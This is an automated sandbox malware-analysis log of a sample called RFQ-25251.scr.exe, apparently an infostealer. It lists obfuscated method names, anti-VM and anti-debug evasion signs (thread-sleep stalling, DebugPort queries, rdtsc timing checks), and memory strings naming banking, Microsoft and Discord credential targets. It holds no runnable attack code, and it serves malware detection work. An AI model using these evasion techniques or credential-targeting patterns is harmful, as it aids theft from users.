                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, terwpcnhoJtEwkSOIS.csHigh entropy of concatenated method names: 'G5k3lATU7y', 'XO53Qu32nO', 'sqE3n2xqS5', 'Rxq3dd6vIm', 'VEK35DHegR', 'mvc3MKqV0i', 'S7i3FZot4c', 'KXB3mhoqaY', 'fqp37AZe4e', 'uTG3fmjivU'
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, KQ5xhVGrSnEGR8Ft4u.csHigh entropy of concatenated method names: 'Dispose', 'mGXAwmrCSs', 'ltMV5FcCu0', 'rD6554vJC8', 'DLIA8HaFM4', 'LysAz0T10t', 'ProcessDialogKey', 'VKcVHLZRW1', 'iVsVApG60P', 'RR1VVAnsKX'
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, BjdM72fL7Hv2eOOnZp.csHigh entropy of concatenated method names: 'Uabt0pnGdw', 'sJXtyk4wnm', 'vS1t4WPpTh', 'NBH48A9sYM', 'kY24zdLKtY', 'hwYtHf8ics', 'NYdtACnPfh', 'TcutVgtRKj', 'ta6tqU9ytJ', 'C4JtsX9pfU'
                Source: 0.2.RFQ-25251.scr.exe.32221b4.0.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, bnsKX38XO5yTMqX9Eh.csHigh entropy of concatenated method names: 'CokpAabYbu', 'Fp0pqNXfx3', 'YBkpsM7Hae', 'duAp0360cZ', 'cfdpGNv6cG', 'LtGpWT5qL6', 'svWp4116eJ', 'MNva97Up8U', 'ENDaT5tbmt', 'Px0awW2ALu'
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, NHpkdm5klk79ypEQio.csHigh entropy of concatenated method names: 'UiXLYP3eOwfThvLC7Za', 'mOZDLh3wN2EGCcygQ1c', 'ot54aC5Bax', 'QP14pVGOiE', 'q9e4uXZYhH', 'R5AFYD3jaBCWkwfmfZD', 'ywd6tr3goy3vL4UOSpb'
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, plXxJ2sElAJaA6eJpb.csHigh entropy of concatenated method names: 'qYOAt1VJJp', 'nKUAJ3pAW3', 'M55AYW98K8', 'TaJArtUCwF', 'yUEA3f21Ce', 'lE6AZvfN9Q', 'xfkCOnYs3EFcpu2aoU', 'sRXNBCuD3FxAkDf3Im', 'U0kAAgfKOJ', 'BUAAq2Bwev'
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, fAf9PIo55W98K8kaJt.csHigh entropy of concatenated method names: 'xBhyBw98MP', 'Y2WyLpT3Uo', 'NcUybExfsn', 'vQtyo1OvV4', 'vT5y3oMCsV', 'jtGyZswFHX', 'aNfyDENE7i', 'Pmqyan7FAZ', 'xrEyprWmAM', 'heEyuZ7Nj9'
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, wCevE6NvfN9Qyv7Vp0.csHigh entropy of concatenated method names: 'XXS4hdIfaf', 'FS64GIeKtK', 'hUk4WoJSFf', 'JXj4ti2Igs', 'jCO4JITZRW', 'wrgWPtWjN6', 'Fd1WO1j48b', 'sDsW94W5bl', 'dGdWTEuPki', 'N7TWwtftt3'
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, pKSsmDJgkrJrZbpmoM.csHigh entropy of concatenated method names: 'cjcqhxGI4H', 'l0fq0i6agg', 'kuPqGPpgpp', 'jYZqyy2EO1', 'WqTqWfNdUZ', 'jkOq4IiZCm', 'anOqtpu5x0', 'VUMqJTFOW7', 'TUBqvu4g9W', 'zMqqYeHkE0'
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, V1VJJpbrKU3pAW3f5X.csHigh entropy of concatenated method names: 'RexGnqMN9j', 'QvWGdOW7WU', 'xPjGkn0tlF', 'CVuGXHiHtR', 'iCDGPJle0b', 'XgoGOIn3AO', 'Ba8G9fS1rc', 'SjHGTGJue9', 'xROGwp1dSp', 'GnCG8m8NKX'
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, CIHaFMT4fys0T10tOK.csHigh entropy of concatenated method names: 'zZMa0xDvkk', 'ChSaG2f9BO', 'OIVaygmpvB', 'f7KaWkx6J5', 'KKba4xCdB7', 'd8ratHFFFl', 'aMwaJOIWud', 'lZLavikvMo', 'vTWaY0sNI7', 'frKarq82wv'
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, N3HOjAzv4Y24unPTPm.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RwLpctThQA', 'Orfp3BEIWC', 'lqnpZprLDg', 'vyepDFTw3X', 't2SpaWNhYc', 'XafppgIsPV', 'ea1puUgqrr'
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, BQQbrtEekkfXprmlLC.csHigh entropy of concatenated method names: 'jpttSjq48j', 'VestxdaTPw', 'kaBtje8DIE', 'W7etB5ELDI', 'I94tURYMVw', 'ULctLiPlnf', 'wBitelENvD', 'd8ntbnV0jC', 'A8YtonM1DL', 'urHtR8v1EN'
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, nLZRW1w4VspG60PnR1.csHigh entropy of concatenated method names: 'FqmaNdcqne', 'n1Ea51fBET', 'u9JaMKQOHH', 'cgjaFH1hio', 'OuPanGbFJA', 'djFamiyvMC', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, NSLw3EVUxbmq1Zwdl0.csHigh entropy of concatenated method names: 'rebjG3yGo', 'A7EBC92FF', 'eJoL4meb3', 'TnxeHrxXC', 'V1PopnDli', 'VkkRbslBk', 'JKRgpsTxwQA6cmJJef', 'feGyOem1dvjwl7Y6fr', 'pA2aGaarZ', 'WbUudsrah'
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, BCwFYJRAa1J2kxUEf2.csHigh entropy of concatenated method names: 'GVsWU6Dm6X', 'TE5WedCGCn', 'nDmyMsQNnU', 'wTRyFEJgnM', 'Y0iymWFNCg', 'qiNy79qhOe', 'Y66yfNJXNg', 'c0XyIRBk8h', 'm1ByEGOH03', 'ilhylgyq2K'
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, EQVqthkdaOMYTCtvpo.csHigh entropy of concatenated method names: 'ToString', 'pA2Z2XW54P', 'vC9Z527vK8', 'toCZM2qES1', 'l5LZFdwdKy', 'wsvZmdFJY9', 'jxLZ7J9VQU', 'JReZfn5KBy', 'r61ZI9oVNM', 'yyLZEwHA1E'
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, PkcfVdC3fyvLif2oJX.csHigh entropy of concatenated method names: 'kVlcbabglr', 'aFCcog9Ah7', 'EOFcNPnYXA', 'qvrc5keb1u', 'QsucFUGEqR', 'qTVcmLO6CI', 'Adscfttdh7', 'tc4cIQ4Wy3', 'CDEclibZ8K', 's4Ec2P9dSf'
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, WTaIdYAHtQIKjWJVo1U.csHigh entropy of concatenated method names: 'NYxpSXV454', 'gRtpxj338Y', 'NXipjHZLmB', 'cngpBreqm8', 'xyEpUXm7nl', 'oBTpL3twsq', 'yNWpeMpyRe', 'rpBpbUguHq', 'UGnpoN2dYx', 'bO2pRDhDu3'
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, mJEmRcAql8VjR5VPgd7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nSWun2APyf', 'TUqud4MbAm', 'TpsukCmf90', 'CY1uXOEmAL', 'miPuP4vUJm', 'DYeuOsfXYY', 'iaqu9JGsM1'
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, sXwvgYAAZbQ3JsUWG7n.csHigh entropy of concatenated method names: 'ToString', 'YFcuqsYWFq', 'QTPusa9BSA', 'iFVuhakJAJ', 'iUZu01RbRA', 'df2uGtBXoe', 'trEuyhDGvJ', 'xknuWmUrHD', 'EXdnQb4qyAviXWSruPF', 'CknueE4iyvR7ThIUTRP'
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, VSTeZLAVPy2vMPTh2O0.csHigh entropy of concatenated method names: 'hexuSfCCAi', 'ep6uxaSpDP', 'U3eujj9knB', 'LXTT57X46CyOlDTm02t', 'm7j8f1X3y9AsgmJAOF1', 'kuD2GNXCGRRmaknHejU', 'K7TN3jXX9lNSGT3umSl', 'wqhfKoXvnWkhSuQRUBB', 'pZCwYKXkVdSQGboN9FF'
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, terwpcnhoJtEwkSOIS.csHigh entropy of concatenated method names: 'G5k3lATU7y', 'XO53Qu32nO', 'sqE3n2xqS5', 'Rxq3dd6vIm', 'VEK35DHegR', 'mvc3MKqV0i', 'S7i3FZot4c', 'KXB3mhoqaY', 'fqp37AZe4e', 'uTG3fmjivU'
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, KQ5xhVGrSnEGR8Ft4u.csHigh entropy of concatenated method names: 'Dispose', 'mGXAwmrCSs', 'ltMV5FcCu0', 'rD6554vJC8', 'DLIA8HaFM4', 'LysAz0T10t', 'ProcessDialogKey', 'VKcVHLZRW1', 'iVsVApG60P', 'RR1VVAnsKX'
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, BjdM72fL7Hv2eOOnZp.csHigh entropy of concatenated method names: 'Uabt0pnGdw', 'sJXtyk4wnm', 'vS1t4WPpTh', 'NBH48A9sYM', 'kY24zdLKtY', 'hwYtHf8ics', 'NYdtACnPfh', 'TcutVgtRKj', 'ta6tqU9ytJ', 'C4JtsX9pfU'
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: RFQ-25251.scr.exe PID: 7676, type: MEMORYSTR
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeMemory allocated: 15B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeMemory allocated: 31E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeMemory allocated: 3120000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeMemory allocated: 85D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeMemory allocated: 95D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeMemory allocated: 97A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeMemory allocated: A7A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B096E rdtsc 7_2_012B096E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\replace.exeWindow / User API: threadDelayed 9808Jump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\replace.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exe TID: 7712Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\replace.exe TID: 1436Thread sleep count: 165 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\replace.exe TID: 1436Thread sleep time: -330000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\replace.exe TID: 1436Thread sleep count: 9808 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\replace.exe TID: 1436Thread sleep time: -19616000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe TID: 1452Thread sleep time: -80000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe TID: 1452Thread sleep count: 44 > 30Jump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe TID: 1452Thread sleep time: -44000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe TID: 1452Thread sleep time: -37500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\replace.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_004BBC00 FindFirstFileW,FindNextFileW,FindClose,15_2_004BBC00
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C3vB7APK.15.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: C3vB7APK.15.drBinary or memory string: tasks.office.comVMware20,11696501413o
                Source: C3vB7APK.15.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: C3vB7APK.15.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: C3vB7APK.15.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: C3vB7APK.15.drBinary or memory string: dev.azure.comVMware20,11696501413j
                Source: replace.exe, 0000000F.00000002.3743671082.0000000007965000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20
                Source: replace.exe, 0000000F.00000002.3743671082.0000000007965000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696501413o
                Source: replace.exe, 0000000F.00000002.3743671082.0000000007965000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware2
                Source: C3vB7APK.15.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: C3vB7APK.15.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: C3vB7APK.15.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: C3vB7APK.15.drBinary or memory string: bankofamerica.comVMware20,11696501413x
                Source: replace.exe, 0000000F.00000002.3743671082.0000000007965000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413GPm
                Source: C3vB7APK.15.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: C3vB7APK.15.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: C3vB7APK.15.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: replace.exe, 0000000F.00000002.3743671082.0000000007965000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,116
                Source: C3vB7APK.15.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: replace.exe, 0000000F.00000002.3729973760.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3730172494.0000000000C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C3vB7APK.15.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: C3vB7APK.15.drBinary or memory string: outlook.office.comVMware20,11696501413s
                Source: C3vB7APK.15.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: replace.exe, 0000000F.00000002.3743671082.0000000007965000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|
                Source: C3vB7APK.15.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: replace.exe, 0000000F.00000002.3743671082.0000000007965000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11
                Source: C3vB7APK.15.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: C3vB7APK.15.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: replace.exe, 0000000F.00000002.3743671082.0000000007965000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rokers - COM.HKVMware20,11696501
                Source: replace.exe, 0000000F.00000002.3743671082.0000000007965000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMwareXP|
                Source: C3vB7APK.15.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: C3vB7APK.15.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: C3vB7APK.15.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: C3vB7APK.15.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: C3vB7APK.15.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: C3vB7APK.15.drBinary or memory string: global block list test formVMware20,11696501413
                Source: C3vB7APK.15.drBinary or memory string: outlook.office365.comVMware20,11696501413t
                Source: C3vB7APK.15.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: C3vB7APK.15.drBinary or memory string: interactiveuserers.comVMware20,11696501413
                Source: replace.exe, 0000000F.00000002.3743671082.0000000007965000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,116965014
                Source: C3vB7APK.15.drBinary or memory string: discord.comVMware20,11696501413f
                Source: firefox.exe, 00000012.00000002.1868108097.0000012C39A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll``
                Source: C3vB7APK.15.drBinary or memory string: AMC password management pageVMware20,11696501413
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B096E rdtsc 7_2_012B096E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_00417673 LdrLoadDll,7_2_00417673
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A0124 mov eax, dword ptr fs:[00000030h]7_2_012A0124
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01330115 mov eax, dword ptr fs:[00000030h]7_2_01330115
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131A118 mov ecx, dword ptr fs:[00000030h]7_2_0131A118
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131A118 mov eax, dword ptr fs:[00000030h]7_2_0131A118
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131A118 mov eax, dword ptr fs:[00000030h]7_2_0131A118
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131A118 mov eax, dword ptr fs:[00000030h]7_2_0131A118
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131E10E mov eax, dword ptr fs:[00000030h]7_2_0131E10E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131E10E mov ecx, dword ptr fs:[00000030h]7_2_0131E10E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131E10E mov eax, dword ptr fs:[00000030h]7_2_0131E10E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131E10E mov eax, dword ptr fs:[00000030h]7_2_0131E10E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131E10E mov ecx, dword ptr fs:[00000030h]7_2_0131E10E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131E10E mov eax, dword ptr fs:[00000030h]7_2_0131E10E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131E10E mov eax, dword ptr fs:[00000030h]7_2_0131E10E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131E10E mov ecx, dword ptr fs:[00000030h]7_2_0131E10E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131E10E mov eax, dword ptr fs:[00000030h]7_2_0131E10E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131E10E mov ecx, dword ptr fs:[00000030h]7_2_0131E10E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01344164 mov eax, dword ptr fs:[00000030h]7_2_01344164
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01344164 mov eax, dword ptr fs:[00000030h]7_2_01344164
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01308158 mov eax, dword ptr fs:[00000030h]7_2_01308158
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0126C156 mov eax, dword ptr fs:[00000030h]7_2_0126C156
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01276154 mov eax, dword ptr fs:[00000030h]7_2_01276154
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01276154 mov eax, dword ptr fs:[00000030h]7_2_01276154
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01304144 mov eax, dword ptr fs:[00000030h]7_2_01304144
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01304144 mov eax, dword ptr fs:[00000030h]7_2_01304144
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01304144 mov ecx, dword ptr fs:[00000030h]7_2_01304144
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01304144 mov eax, dword ptr fs:[00000030h]7_2_01304144
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01304144 mov eax, dword ptr fs:[00000030h]7_2_01304144
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B0185 mov eax, dword ptr fs:[00000030h]7_2_012B0185
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F019F mov eax, dword ptr fs:[00000030h]7_2_012F019F
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F019F mov eax, dword ptr fs:[00000030h]7_2_012F019F
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F019F mov eax, dword ptr fs:[00000030h]7_2_012F019F
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F019F mov eax, dword ptr fs:[00000030h]7_2_012F019F
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0126A197 mov eax, dword ptr fs:[00000030h]7_2_0126A197
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0126A197 mov eax, dword ptr fs:[00000030h]7_2_0126A197
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0126A197 mov eax, dword ptr fs:[00000030h]7_2_0126A197
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01314180 mov eax, dword ptr fs:[00000030h]7_2_01314180
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01314180 mov eax, dword ptr fs:[00000030h]7_2_01314180
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0132C188 mov eax, dword ptr fs:[00000030h]7_2_0132C188
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0132C188 mov eax, dword ptr fs:[00000030h]7_2_0132C188
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013461E5 mov eax, dword ptr fs:[00000030h]7_2_013461E5
